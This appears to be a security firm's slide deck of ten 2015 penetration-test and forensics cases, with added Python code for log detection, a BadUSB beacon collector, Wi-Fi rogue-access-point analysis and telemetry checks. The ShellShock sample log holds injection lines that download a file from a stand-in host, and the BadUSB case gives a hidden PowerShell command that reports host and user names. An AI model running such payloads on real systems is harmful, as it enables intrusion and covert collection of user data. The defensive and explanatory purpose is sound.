White hat
Cases of the year
2015 TOP-10
Maxim Avdyunin
LLC Advanced Monitoring
Corporate Group
Advanced Monitoring
Criminal Code of Russia. Article 272. Illegal Access to Computer Information.
Criminal Code of Russia. Article 273. Creation, Use, and Dissemination of Harmful Computer Programs.
Criminal Code of Russia. Article 274. Violation of Rules for the Operation of Computers, Computer Systems, or Their Networks.
vs
We are the white hat hackers!
Customer List
Ministry of Information Development and Communications of the Perm Territory
The Federal Service for State Registration, Cadastre and Cartography (Rosreestr)
Khabarovsk Territory Government
JSC Russian Railways
PJSC «Uralkali»
etc.
Advanced Monitoring
Information Security Audit
Software Security Audit
Penetration Testing
Software development
IS Incident Monitoring
Digital Forensics
Competitive Intelligence
Our arsenal
Network Scanners
IP-Tools
nmap
Vulnerability Scanners
MaxPatrol
Nessus
Traffic Analyzers
Wireshark
Intercepter-ng
Ettercap-ng
GigaStor
Tcpdump
Web Vulnerability Scanners
Acunetix
Burp Suite
Nikto
arachni
sqlmap
Exploit frameworks
Metasploit
Online exploit databases:
0day.today
rapid7.com
exploit-db.com
Static Analyzers
PVS-Studio
Cppcheck
Clang
SonarQube
Disassemblers / Debuggers
IDA
OllyDbg
WinDbg
Immunity Debugger
GDB
Brute-force tools
hydra
John the Ripper
hashcat
Developer tools
Visual Studio
Eclipse
IDLE
Cases of the year
Top 10
Case 1/10
«Bad news»
Client
Government contractor
Task and setting
Perform a black-box penetration test
Work done
A spear-phishing attack on the client's personnel was carried out with two “news” e-mails, one about
parking fees and one about pensions, each containing a link to a web page whose script captured the
users' authentication credentials.
Results
 More than half of the staff followed at least one of the links
 Nobody reported the suspicious e-mails to the client's Information Security Department
 The client's IT infrastructure was fully compromised in the course of the test
 The Information Security Department's activity was logged, and the log was included in the final
report
Case 2/10
«Leaky front-end»
Client
Large governmental organization
Task and setting
Perform an information security audit of a client-server sales system
Work done
The client terminal was reverse engineered and its web interface examined with tools; the server
components were penetration-tested and fuzzed.
Results
 A fuzzing procedure that reliably caused the server to malfunction was developed
 A variety of vulnerabilities were found in the client software. They would allow an attacker to:
o Tamper with the information on the client
o Send modified data to the server
o Clone client terminals
Case 3/10
«Shakespearean tragedy»
Client
A theater
Setting
Leak of confidential financial information about management salaries
Its publication on the Internet
Backlash from the client's personnel
Task
Find the source of the leak and the people responsible
Work done
The leaked materials were analysed and a list of potential perpetrators was drawn up
Data on their computers was copied and examined
The source data was traced in the file archives and the potential leakage paths were determined
Results
The leakage sources were identified and recommendations for closing them were made
The client was given a list of suspects
Case 4/10
«Blowing the lid off»
Client
Shipment tracking information provider
Task and setting
Some web sites were selling information that our client distributes, without any legal right to it.
The task was to find out how they obtained the information and, if possible, to deanonymise them.
Work done
Open-source intelligence (OSINT) research was performed and the sites of interest were examined with
tools.
Results
The following information was obtained:
 The list of people affiliated with the web resources in question
 Their personal and contact information, social connections, etc.
 Confidential information, legal documents in particular
Case 5/10
«Watchmen»
Client
Large IT-Company
Task and setting
The client asked Advanced Monitoring to build a system for monitoring information security incidents in
its network, to define procedures for on-the-spot incident response, and to write the corresponding rules
for the corporate intrusion detection system.
Work done
 Advanced Monitoring established an Information Security Operations Center (AM ISOC)
 The AM ISOC was integrated with the client's network infrastructure and with AM's tool base (network
scanners, traffic analysers, etc.)
 Detection and response procedures were established and tested in a live (“combat”) environment
Results
Over a five-month period:
 29 information security incidents were detected and handled
 34 signatures for the client's IDS were developed
Case 6/10
«The Star-Spangled Scare»
Client
Large IT-company
Task and setting
Investigate an incident that took place in the client's network
Work done
Monitoring of the client's network showed an attempted ShellShock attack (CVE-2014-6271).
The client's resources were not vulnerable to it and no harm was done.
Analysis of the attack showed that the intruder had been sending requests from San Antonio, US,
scanning for vulnerable resources.
Connecting to the command-and-control server to observe it showed that about 300 victims had been
successfully attacked and turned into bots.
One of the infected IP addresses belonged to the Russian hosting provider «Radiosvyaz».
Among the services hosted on that IP was an e-mail server handling the mail domain of a large regional
power generation company; it turned out to have been hacked by the same intruder.
Results
The owners of the server were informed that their web resource had been compromised and was being used as
part of a botnet.
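The ShellShock probe described above leaves a clear trace in ordinary web server logs: the crafted value starting with `() {` arrives in a request header (most often User-Agent or Referer) that the CGI interface copies into an environment variable, where a vulnerable bash executes whatever follows the function body. The following is an added example, not code from the deck or from Advanced Monitoring, that scans combined-format access log lines for the trigger pattern and extracts the injected command; the log lines, source addresses and the probe URL are constructed for the example.

```python
import re
from collections import Counter, namedtuple

# Trigger of CVE-2014-6271 / CVE-2014-7169: a value that starts with an empty
# bash function definition "() {". Unpatched bash parsed such an environment
# variable as a function and then executed the text after the body.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache/nginx "combined" log format; header values may contain escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Request parts that CGI exports as environment variables (QUERY_STRING,
# HTTP_REFERER, HTTP_USER_AGENT), which is how the crafted value reaches bash.
HEADER_NAMES = {"request": "request line", "referer": "Referer", "agent": "User-Agent"}

Hit = namedtuple("Hit", "src_ip header value command")

# Constructed sample log (not real traffic): one benign request and two probes
# from the same source, one via User-Agent and one via Referer.
SAMPLE_LOG = r"""
198.51.100.7 - - [24/Sep/2014:14:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://probe.example.invalid/x -O /tmp/x\""
203.0.113.5 - - [24/Sep/2014:14:00:02 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [24/Sep/2014:14:00:03 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 200 "() { test;};echo Content-type:text/plain;echo;/usr/bin/id" "curl/7.38.0"
"""


def injected_command(value):
    """Return the command appended after the function body, with log escaping undone."""
    _, _, tail = value.partition("}")
    return tail.lstrip(";").strip().replace('\\"', '"')


def find_shellshock(lines):
    """Scan combined-format log lines and return one Hit per offending field."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # blank or malformed line
        for field, name in HEADER_NAMES.items():
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append(Hit(m.group("ip"), name, value, injected_command(value)))
    return hits


def probing_sources(hits):
    """Probes per source address: the input for a block list or an IDS alert threshold."""
    return Counter(h.src_ip for h in hits)


if __name__ == "__main__":
    hits = find_shellshock(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"{h.src_ip:15} via {h.header:12} -> {h.command}")
    print(probing_sources(hits))
```

Matching `() {` flags the attempt whether or not the target was vulnerable, which is exactly the situation in this case: the same byte pattern, looked for in HTTP headers, is what an IDS signature for the client's sensor would carry. Before escalating a hit beyond "probe", check the response status and the bash version on the target, and treat the injected command (here a download to /tmp) as the indicator to hunt for on other hosts.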
Case 7/10
«Booky buccaneers»
Client
Electronic publisher
Task and setting
Perform a security audit of the client application of an e-book distribution platform and check
whether books can be stolen from it.
Work done
The Android, iOS and Windows 8.1 versions of the client application used to download and read e-books
were reverse engineered. The research also covered interception of the application's traffic as a route
to unauthorised access to copyrighted material.
Results
 Three vulnerabilities in the client application were found and exploited
 Unauthorised access to the distributed content and to account data was gained
 One vulnerability in the server application was found
 A set of remedial measures for the vulnerabilities found, and suggestions for raising the platform's
overall security, were proposed
Case 8/10
«USB maneuvers»
Client
A large industrial company
Task and setting
An industrial facility handling national security information asked Advanced Monitoring to plan and run
an information security exercise: “infected” USB drives were scattered on the client's premises, and
information on their use was collected once they were plugged into a computer.
Work done and results
AM developed USB flash drive firmware suitable for a BadUSB attack: once plugged into a computer, the
drive presented itself as two different USB devices at once, one of them a keyboard. The emulated
keyboard then typed a sequence of commands that ran a script on the victim's machine; the script was not
flagged by the antivirus software in use. In this exercise the potentially malicious script was benign:
it only reported the drive's use to a server on the LAN.
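The collecting side of such an exercise, as an added example that is not Advanced Monitoring's code: a small HTTP listener on the LAN that records which prepared drive (identified by the label the keystroke payload types in) was plugged into which host by which user, rejects beacons for labels that were never issued, and reports the drives nobody touched. The drive labels, drop locations and host names are constructed, and the beacon URL scheme is an assumption.

```python
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Drives prepared for the exercise: the label typed by the keyboard payload,
# mapped to the place where that drive was dropped. Constructed for the
# example; a real exercise keeps this in the engagement log.
DROPPED_DRIVES = {
    "AM-001": "car park, row B",
    "AM-002": "smoking area",
    "AM-003": "canteen, table 4",
}


def record_beacon(path, client_ip, store, now=None):
    """Parse one beacon such as /beacon?drive=AM-002&host=WS-17&user=petrov.

    Returns the stored record, or None when the drive label is not one of
    ours, so a stray request cannot pollute the results."""
    params = parse_qs(urlparse(path).query)
    drive = params.get("drive", [""])[0]
    if drive not in DROPPED_DRIVES:
        return None
    when = now or datetime.now(timezone.utc)
    record = {
        "drive": drive,
        "dropped_at": DROPPED_DRIVES[drive],
        "host": params.get("host", ["?"])[0][:64],  # bounded: typed by an untrusted host
        "user": params.get("user", ["?"])[0][:64],
        "ip": client_ip,
        "time": when.isoformat(timespec="seconds"),
    }
    store.append(record)
    return record


def report(store):
    """Per drive: where it was dropped, which hosts and users ran the payload,
    and when it was first plugged in."""
    out = {}
    for r in store:
        d = out.setdefault(r["drive"], {
            "dropped_at": r["dropped_at"], "hosts": set(), "users": set(),
            "first_seen": r["time"],
        })
        d["hosts"].add(r["host"])
        d["users"].add(r["user"])
        d["first_seen"] = min(d["first_seen"], r["time"])
    return out


def untouched_drives(store):
    """Drives that were never plugged in (or whose beacon never reached us)."""
    return set(DROPPED_DRIVES) - {r["drive"] for r in store}


class BeaconHandler(BaseHTTPRequestHandler):
    store = []  # shared across requests; adequate for a single-process collector

    def do_GET(self):
        ok = record_beacon(self.path, self.client_address[0], self.store) is not None
        self.send_response(204 if ok else 404)
        self.end_headers()

    def log_message(self, *args):  # keep stdout quiet; the store is the record
        pass


if __name__ == "__main__":
    # Bind to the LAN-facing interface only; the payload calls
    # http://<collector>:8080/beacon?drive=...&host=...&user=...
    HTTPServer(("0.0.0.0", 8080), BeaconHandler).serve_forever()
```

On a Windows target the keystroke sequence would open the Run dialog and type something like `powershell -w hidden -c "iwr -UseBasicParsing ('http://10.0.0.5:8080/beacon?drive=AM-002&host='+$env:COMPUTERNAME+'&user='+$env:USERNAME)"` (collector address assumed); the label is the only thing that differs between drives, which is what ties each plug-in to a drop location. Keep the collector reachable from the LAN only: the deliverable of the exercise is the per-location and per-department figures, not a list of named users.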
Case 9/10
«Wireless mayhem»
Client
Large IT-company
Task and setting
Survey the client's office space to detect unauthorised Wi-Fi hotspots.
Work done
A survey methodology using a laptop, a Wi-Fi antenna and specialised software was developed.
Using it, the client's office space was examined systematically: a map of Wi-Fi signal strength was
built and every signal source was located.
Results
The client's office space, 30 rooms on two floors of the building, was checked for hotspots: 10 authorised
and 25 unauthorised hotspots were found.
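An added example, not the deck's own methodology or code, of the analysis step of such a survey: parse scans taken with `iw dev wlan0 scan` in several rooms, keep the strongest sighting of each BSSID as its likely location, and flag unknown radios, including an evil twin that broadcasts the corporate SSID from an unauthorised BSSID. The inventory of authorised access points, the scan excerpts and the dBm threshold are constructed assumptions.

```python
import re
from collections import namedtuple

BSS = namedtuple("BSS", "bssid ssid freq signal")
Finding = namedtuple("Finding", "bssid ssid freq signal room verdict")

BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})")

# Authorised corporate access points and SSIDs (assumed inventory, constructed
# for the example).
AUTHORIZED_BSSIDS = {"00:11:22:33:44:01", "00:11:22:33:44:02"}
CORPORATE_SSIDS = {"CorpNet"}

# Constructed excerpts of `iw dev wlan0 scan` output, one per room surveyed.
# Real output is tab-indented and carries many more fields; only the lines the
# parser uses are shown.
SCANS = {
    "Room 201": """\
BSS 00:11:22:33:44:01(on wlan0)
    freq: 2412
    signal: -41.00 dBm
    SSID: CorpNet
BSS de:ad:be:ef:00:01(on wlan0)
    freq: 2437
    signal: -38.00 dBm
    SSID: CorpNet
BSS aa:bb:cc:dd:ee:10(on wlan0)
    freq: 2462
    signal: -47.00 dBm
    SSID: Ivan iPhone
BSS aa:bb:cc:dd:ee:20(on wlan0)
    freq: 2412
    signal: -88.00 dBm
    SSID: NeighbourCafe
""",
    "Room 214": """\
BSS 00:11:22:33:44:02(on wlan0)
    freq: 5180
    signal: -55.00 dBm
    SSID: CorpNet
BSS de:ad:be:ef:00:01(on wlan0)
    freq: 2437
    signal: -60.00 dBm
    SSID: CorpNet
BSS aa:bb:cc:dd:ee:10(on wlan0)
    freq: 2462
    signal: -70.00 dBm
    SSID: Ivan iPhone
""",
}


def parse_iw_scan(text):
    """Parse `iw dev <ifname> scan` text into BSS records."""
    found, cur = [], None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:
            if cur:
                found.append(BSS(**cur))
            cur = {"bssid": m.group(1), "ssid": "", "freq": 0, "signal": 0.0}
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("freq:"):
            cur["freq"] = int(float(s.split(":", 1)[1].split()[0]))  # "2412" or "2412.0"
        elif s.startswith("signal:"):
            cur["signal"] = float(s.split(":", 1)[1].split()[0])  # "-41.00 dBm"
        elif s.startswith("SSID:"):
            cur["ssid"] = s[5:].strip()
    if cur:
        found.append(BSS(**cur))
    return found


def classify(scans_by_room, authorized_bssids, corporate_ssids, on_premises_dbm=-65.0):
    """Merge per-room scans, keep the strongest sighting of every BSSID, and
    give each one a verdict. The dBm threshold separating "inside the office"
    from "neighbour" is an assumption to be calibrated on site."""
    best = {}
    for room, text in scans_by_room.items():
        for bss in parse_iw_scan(text):
            if bss.bssid not in best or bss.signal > best[bss.bssid][1].signal:
                best[bss.bssid] = (room, bss)
    findings = []
    for room, bss in best.values():
        if bss.bssid in authorized_bssids:
            verdict = "authorised"
        elif bss.ssid in corporate_ssids:
            verdict = "evil-twin"          # corporate SSID from an unknown radio
        elif bss.signal >= on_premises_dbm:
            verdict = "rogue-on-premises"  # strong enough to be inside the building
        else:
            verdict = "external"
        findings.append(Finding(bss.bssid, bss.ssid, bss.freq, bss.signal, room, verdict))
    return sorted(findings, key=lambda f: f.signal, reverse=True)


if __name__ == "__main__":
    for f in classify(SCANS, AUTHORIZED_BSSIDS, CORPORATE_SSIDS):
        print(f"{f.bssid}  {f.ssid:14} {f.freq:5} MHz {f.signal:7.1f} dBm  {f.room:9} {f.verdict}")
```

A BSSID allowlist catches rogue access points that a name-based check misses; the signal threshold only suggests which unknown radios are inside the building, and walking the floor with a directional antenna, as the deck describes, is what actually locates them. `iw` needs root and a Linux wireless interface; on Windows, `netsh wlan show networks mode=bssid` gives comparable data with a different layout.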
Case 10/10
«AM — the Privacy Protector»
Client
Large IT-company
Task and setting
Check whether Windows 10 really spies on its users
Make a list of recommendations for disabling such functionality
Work done
The available recommendations were collected, verified (with Wireshark) and improved.
A specialised tool for applying a chosen subset of those recommendations was developed.
Results
An installation image with all the recommendations applied was built and handed over to the client
The software developed was published openly: http://amonitoring.ru/cc/program/am-privacy-protector-w10/
Our experience and all the recommendations were also published: www.anti-malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2
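To verify a recommendation set the way the deck describes (with Wireshark), capture DNS traffic before and after applying it and compare which diagnostics endpoints the machine still resolves. The following added example, which is not the AM Privacy Protector tool, does that comparison on `tshark -T fields` output; the list of telemetry host names is an assumption drawn from commonly published lists for Windows 10 Threshold 2, and the capture lines are constructed.

```python
from collections import namedtuple

Query = namedtuple("Query", "ts src name")

# Host names Windows 10 (Threshold 2) contacts for diagnostics/telemetry.
# Assumed list for the example; check it against the Anti-Malware.ru article
# referenced above and refresh it per build, since the names change.
TELEMETRY_HOSTS = {
    "vortex-win.data.microsoft.com": "telemetry upload",
    "settings-win.data.microsoft.com": "telemetry settings",
    "telecommand.telemetry.microsoft.com": "telemetry",
    "watson.telemetry.microsoft.com": "error reporting",
}

# How the input is produced from a Wireshark capture (queries only).
TSHARK_CMD = ("tshark -r capture.pcap -Y 'dns.flags.response == 0' "
              "-T fields -e frame.time_epoch -e ip.src -e dns.qry.name")

# Constructed tshark output (tab-separated) for the same machine before and
# after the recommendations were applied.
BEFORE = """\
1447770001.10\t192.168.10.21\tvortex-win.data.microsoft.com
1447770001.35\t192.168.10.21\tsettings-win.data.microsoft.com
1447770003.80\t192.168.10.21\twatson.telemetry.microsoft.com
1447770004.12\t192.168.10.21\twww.msftncsi.com
1447770009.50\t192.168.10.21\tupdate.example.invalid
"""
AFTER = """\
1447860001.40\t192.168.10.21\twww.msftncsi.com
1447860002.90\t192.168.10.21\twatson.telemetry.microsoft.com
1447860010.00\t192.168.10.21\tupdate.example.invalid
"""


def parse_tshark_dns(text):
    """Parse `tshark -T fields` output (one query per line) into Query records."""
    out = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 3 or not parts[2]:
            continue
        out.append(Query(float(parts[0]), parts[1], parts[2].rstrip(".").lower()))
    return out


def telemetry_names(queries):
    """Telemetry host names present in the capture, with a query count for each."""
    hits = {}
    for q in queries:
        if q.name in TELEMETRY_HOSTS:
            hits[q.name] = hits.get(q.name, 0) + 1
    return hits


def compare(before_text, after_text):
    """Which telemetry endpoints the recommendations silenced, and which are
    still resolved (a recommendation is missing or did not take effect)."""
    before = telemetry_names(parse_tshark_dns(before_text))
    after = telemetry_names(parse_tshark_dns(after_text))
    return {
        "silenced": sorted(set(before) - set(after)),
        "still_contacted": sorted(after),
    }


if __name__ == "__main__":
    result = compare(BEFORE, AFTER)
    for name in result["still_contacted"]:
        print(f"still resolved: {name} ({TELEMETRY_HOSTS[name]})")
    print("silenced:", ", ".join(result["silenced"]))
```

DNS going quiet is necessary but not sufficient: a hosts-file or DNS block leaves a component free to contact an address it already knows, so also filter the capture on `ip.dst` for the addresses those names resolved to before the change. The NCSI probe (www.msftncsi.com) is connectivity detection rather than telemetry and is deliberately not on the list.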
Thanks for your time!
Maxim Avdyunin
LLC Advanced Monitoring
info@AMonitoring.ru
Examples of Advanced Monitoring («Перспективный мониторинг») projects in 2015

  • 1. White hat Cases of the year 2015 TOP-10 Maxim Avdyunin
  • 3. Advanced Monitoring Criminal Code of Russia. Article 272. Illegal Accessing of Computer Information. Criminal Code of Russia. Article 273. Creation, Use, and Dissemination of Harmful Computer Viruses Criminal Code of Russia. Article 274. Violation of Rules for the Operation of Computers, Computer Systems, or Their Networks vs We are the white hat hackers!
  • 4. Informational development and Communications ministry of the Perm Territory The Federal Service for State Registration, Cadastre and Cartography (Rosreestr) Khabarovsk Territory government JSC Russian Railways PJSC «Uralkali» etc. Customer List Advanced Monitoring
  • 5. Information Security Audit Software Security AuditPenetration testing Software development IS Incident Monitoring Digital Forensics Competitive Intelligence
  • 6. Our arsenal Network Scanners IP-Tools nmap Vulnerability Scanners MaxPatrol Nessus Traffic Analyzers Wireshark Intercepter-ng Ettercap-ng GigaStor Tcpdump Web Vulnerability Scanner Acunetix Burp Suite Nikto arachni sqlmap Exploit frameworks Metasploit Online bases: 0day.today rapid7.com exploit-db.com Static Analyzers PVS-Studio Cppcheck Clang SonarQUBE Disassemblers / Debuggers IDA OllyDbg WinDbg Immunity Debagger GDB Brute force software hydra John the Ripper hashcat Developer tools Visual Studio Eclipse IDLE
  • 7. Cases of the year Top 10
  • 8. Case 1/10 «Bad news» Client Government contractor Task and setting Perform a black box penetration testing Work done A spear phishing attack on client personnel was performed with two “news” letters about parking fees and pensions, containing web link to a script, that intercepted user authentication information
  • 9. Case 1/10 «Bad news» Results  More then a half of staff followed at least one of the links  Nobody reported suspicious letters to a client’s Information Security Department  Client’s IT-infrastructure has been fully compromised during the testing  Information Security Department activity has been logged and log was included in a final report
  • 10. Case 2/10 «Leaky front-end» Client Large governmental organization Task and setting Perform a server-client sales system information security audit Work done Client terminal reverse engineering, its web-interface instrumental examination, and also penetration testing and fuzzing of its server components have been performed
  • 11. Results  Fuzzing procedure that guaranteed server malfunction has been developed  A variety of vulnerabilities have been found in client software. Those vulnerabilities could allow an attacker to: o Tamper with the information on the client o Send modified data to the server o Clone client terminals Case 2/10 «Leaky front-end»
  • 12. Case 3/10 «Shakespearean tragedy» Client A theater Setting Leak of confidential financial information about directory salary It’s publication on the Internet Backlash from Client’s personnel Task Find the source of the leak and people responsible
  • 13. Case 3/10 «Shakespearean tragedy» Work done Leaked materials were analyzed and a list of potential malefactors was created Information on their computers was copied and examined Source data searched in the file archives and potential leakage paths were determined Results Leakage sources were determined and recommendations for their closure were made Client was given a list of suspects
  • 14. Case 4/10 «Blowing the lid off» Client Shipment tracking information provider Task and setting Some web-sites offered for sale information distributed by our Client without any legal ways to. The task was to find out how they get the information and if possible deanomize them Work done To complete the task an open source intelligence research was performed and sites of interest were analyzed instrumentally
  • 15. Case 4/10 «Blowing the lid off» Results The following information has been acquired:  The list of people affiliated with the web resources in question  Their personal and contact information, social relations, etc.  Confidential information, legal documents in particular
  • 16. Case 5/10 «Watchmen» Client Large IT-Company Task and setting A Client asked Advanced monitoring to develop a system of information security incident monitoring in his network and protocols for an on-the-spot incident response, and to create corresponding rules for the corporate intrusion detection system. Work done  Advanced Monitoring has established an Information Security Operation Center (AM ISOC)
  • 17.  AM ISOC has been integrated with Client’s network infrastructure and AM instrumental base (network scanners, traffic analyzers, etc)  Detection and response protocols have been established and tested in “combat environment” Results During a five months period:  29 information security incidents were detected and handled  34 signatures for Client IDS were developed Case 5/10 «Watchmen»
  • 18. Case 6/10 «The Star-Spangled Scare» Client Large IT-company Task and setting Investigate an incident taken place in client’s network Work done Monitoring of a Client’s network showed an attempt of a ShellShock attack. Client’s resources were not vulnerable to the attack and no harm was done. Attack analysis showed that an intruder had been sending queries in the search for vulnerable resources from San-Antonio, US.
  • 19. Connecting to a Command&Control server with the observation purpose showed that about 300 victims were successfully attacked and “zombified”. One of the infected IP-addresses turned out to belong to a Russian hosting provider «Radiosvyaz». Among the services hosted on that IP an e-mail server, operating a mail domain of a large regional generation company was found. As it turned out it was hacked by our intruder. Results Owners of a server were informed of the compartmentation of their web resource and it’s use as a part of a botnet. Case 6/10 «The Star-Spangled Scare»
  • 20. Case 7/10 «Booky buccaneers»
    Client: Electronic publisher
    Task and setting: Perform a security audit of the client application of an e-book distribution platform. Check whether books can be stolen.
    Work done: Within the framework of the project, the Android, iOS and Windows 8.1 versions of the client application for downloading and reading e-books were reverse engineered. The research also included checking for traffic interception possibilities, i.e. the risk of unauthorized access to copyrighted material.
  • 21. Case 7/10 «Booky buccaneers»
    Results
    - Three client application vulnerabilities were found and exploited
    - Unauthorized access to distributed content and account data was gained
    - One server application vulnerability was found
    - A set of remedial measures for the vulnerabilities found and suggestions for increasing the platform's overall security were proposed
  • 22. Case 8/10 «USB maneuvers»
    Client: A large industrial company
    Task and setting: An industrial facility dealing with national security information turned to Advanced Monitoring to plan and organize information security maneuvers: "infected" USB drives would be scattered on the Client's premises and information about their usage collected after they were connected to a computer.
  • 23. Case 8/10 «USB maneuvers»
    Work done and results: AM developed USB flash drive firmware suitable for a BadUSB attack, which enabled the emulation of two different devices once a drive with that special firmware was connected to a computer. In the course of the attack, the device emulating a keyboard sent a sequence of instructions that ran a script (undetectable by antivirus software) on the victim's machine. In this case the potentially malicious script only sent information about the drive's usage to a LAN server.
  • 24. Case 9/10 «Wireless mayhem»
    Client: Large IT company
    Task and setting: Check the Client's office space in order to detect unauthorized Wi-Fi hotspots.
  • 25. Case 9/10 «Wireless mayhem»
    Work done: A methodology using a laptop, a Wi-Fi antenna and special software was created. Using this methodology, the Client's office space was examined systematically. A Wi-Fi signal map was built and all sources of the signal were found.
    Results: The Client's office space of 30 rooms on two floors of the building was checked for hotspots. 10 legal and 25 illegal hotspots were found.
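The survey above ends with sorting every observed hotspot into legal and illegal. The following is an added example, not Advanced Monitoring's own survey tooling: it takes constructed survey records (BSSID, SSID, channel, signal) from a walk-through, keeps the strongest sighting per BSSID, and checks each against a hypothetical inventory of sanctioned access points, separating unknown hotspots from evil twins (a corporate SSID broadcast from a BSSID that is not in the inventory). The inventory, BSSIDs and SSIDs are all constructed.

```python
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class AccessPoint:
    bssid: str
    ssid: str
    channel: int
    signal_dbm: int

# Constructed inventory of sanctioned hotspots: BSSID -> SSID (hypothetical values).
AUTHORIZED: Dict[str, str] = {
    "00:11:22:33:44:01": "CorpNet",
    "00:11:22:33:44:02": "CorpNet",
    "00:11:22:33:44:03": "CorpGuest",
}
CORP_SSIDS = set(AUTHORIZED.values())

# Constructed survey output, one record per sighting: "BSSID SSID channel signal_dBm".
SURVEY = """\
00:11:22:33:44:01 CorpNet 6 -45
00:11:22:33:44:02 CorpNet 11 -60
00:11:22:33:44:03 CorpGuest 1 -52
AA:BB:CC:DD:EE:01 CorpNet 6 -40
aa:bb:cc:dd:ee:02 Ivan_iPhone 1 -70
00:11:22:33:44:01 CorpNet 6 -48
"""

def parse_survey(text: str) -> List[AccessPoint]:
    """Parse survey records; repeated sightings of one BSSID keep the strongest signal."""
    best: Dict[str, AccessPoint] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed records
        ap = AccessPoint(parts[0].lower(), parts[1], int(parts[2]), int(parts[3]))
        if ap.bssid not in best or ap.signal_dbm > best[ap.bssid].signal_dbm:
            best[ap.bssid] = ap
    return list(best.values())

def classify(aps: List[AccessPoint]) -> Dict[str, List[AccessPoint]]:
    """Split APs into legal, evil_twin (corporate SSID on an unknown BSSID) and unknown."""
    result: Dict[str, List[AccessPoint]] = {"legal": [], "evil_twin": [], "unknown": []}
    for ap in aps:
        if AUTHORIZED.get(ap.bssid) == ap.ssid:
            result["legal"].append(ap)
        elif ap.ssid in CORP_SSIDS:
            result["evil_twin"].append(ap)  # highest priority for follow-up
        else:
            result["unknown"].append(ap)
    return result
```

Evil twins deserve the first site visit, since a stronger signal on the corporate SSID (as in the sample, -40 dBm versus -45 dBm) is what pulls clients away from the legitimate network.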
  • 26. Case 10/10 «AM — the Privacy Protector»
    Client: Large IT company
    Task and setting: Check whether Windows 10 really spies on users. Make a list of recommendations for disabling such functionality.
  • 27. Case 10/10 «AM — the Privacy Protector»
    Work done: Available recommendations were collected, checked (with Wireshark) and improved. A specialized tool for selectively applying those recommendations was developed.
    Results: An installation image with all recommendations applied was made and given to the Client. The software developed was published openly: http://amonitoring.ru/cc/program/am-privacy-protector-w10/ Our experience and all the recommendations were also published: www.anti-malware.ru/analytics/Threats_Analysis/Windows_10_Threshold_2
  • 28. Thanks for your time!
    Maxim Avdyunin, LLC Advanced Monitoring
    info@AMonitoring.ru

Editor's Notes

  1. • Network scanners • Vulnerability scanners • Traffic analyzers • Web vulnerability scanner • Exploitation platform • Static analyzers • Disassemblers / debuggers • Brute-force tools • Development tools
  2. Client Government contractor Task and setting Perform black-box penetration testing Work done Within the project, a phishing attack was carried out against the Customer's company, in the course of which employees were sent 2 "news" letters containing links to a script that intercepted the authentication data of the users of the respective machines
  3. Results More than half of the employees followed at least one of the links. None of them reported the incident to the Customer's information security service. The researchers obtained full access to the Customer's IT infrastructure. The actions of the Customer's IS service were logged, and the log was included in the report
  4. Client Large state organization Task and setting Check the security of a client-server sales system Work done Within the project, the sales terminal client software was reverse-engineered and its web interface was examined with tools; penetration testing and fuzzing of the server side were also carried out
  5. Results A fuzzing methodology was developed that reliably causes failures in the server. A number of vulnerabilities were found in the client software, allowing: changing information on the terminal; sending modified data to the server; cloning terminals
  6. One of the Customer's employees passed information on the salaries of the theater's management to third parties; its publication led to increased tension among the staff and negative press. Due to the specifics of the task, the work was carried out under the assumption that there were no trusted persons and that there were several violators. The task was to find the source of the leak and, ideally, identify the culprit.
  7. Work done Within the project, the leaked materials were analyzed, a list of potential suspects was drawn up, file archives of their workstations were created and a recursive search for the original information was conducted over them, and assumptions were made about possible leak channels. Results Based on the results of the work, the sources of the leaked information were identified, a list of suspects was compiled, descriptions of possible leak channels were proposed, and recommendations for eliminating them were developed.
  8. Client Provider of cargo shipment tracking information Task and setting A number of websites offer information distributed by the Customer for sale, evidently obtaining it outside official channels. It is necessary to establish how this happens Work done Within the project, competitive intelligence and an instrumental examination of the sites specified by the Customer were carried out
  9. Results The following were obtained: A list of persons affiliated with the sites under study; their personal data, contact information, social connections, etc.; confidential information, in particular legal documents
  10. The Customer approached ZAO «PM» with a request to organize monitoring of IS incidents in its network, to ensure a response when they occur, and to develop corresponding signatures for the corporate intrusion detection system
  11. The monitoring center was integrated with the Customer's network infrastructure and with security analysis tools (in particular, security scanners). Protocols for detecting and responding to IS incidents were developed and applied. Results Over five months: 29 information security events were detected and handled; 34 signatures for the Customer's IDS were developed
  12. Client Large IT company Task and setting Monitor the Customer's network Work done During monitoring of the company's network, the monitoring center specialists detected a ShellShock network attack. The network's resources are not susceptible to this vulnerability and were not affected. Attack analysis showed that the attacker was sending requests in search of servers vulnerable to the attack from an address in San Antonio, USA.
  13. Having connected to the C&C server to observe the attacker's actions, we found more than 300 victim bots in various countries around the world under its control. One of the infected IP addresses turned out to be registered to the Russian provider ZAO «Radiosvyaz». Among the services running on it, a mail server was found serving the mail domain of a large regional power generation company, which had been hacked by the attacker. Results The owners of this server were notified of the compromise of their host and of its use as part of a botnet.
  14. According to numerous reports published openly on the Internet, migrating to Windows 10 may expose users to problems with the confidentiality of the information processed in the system and of the personal data of its owner. The task involved collecting and verifying the available information on this matter and developing a means of counteracting suspicious activity of Windows 10.
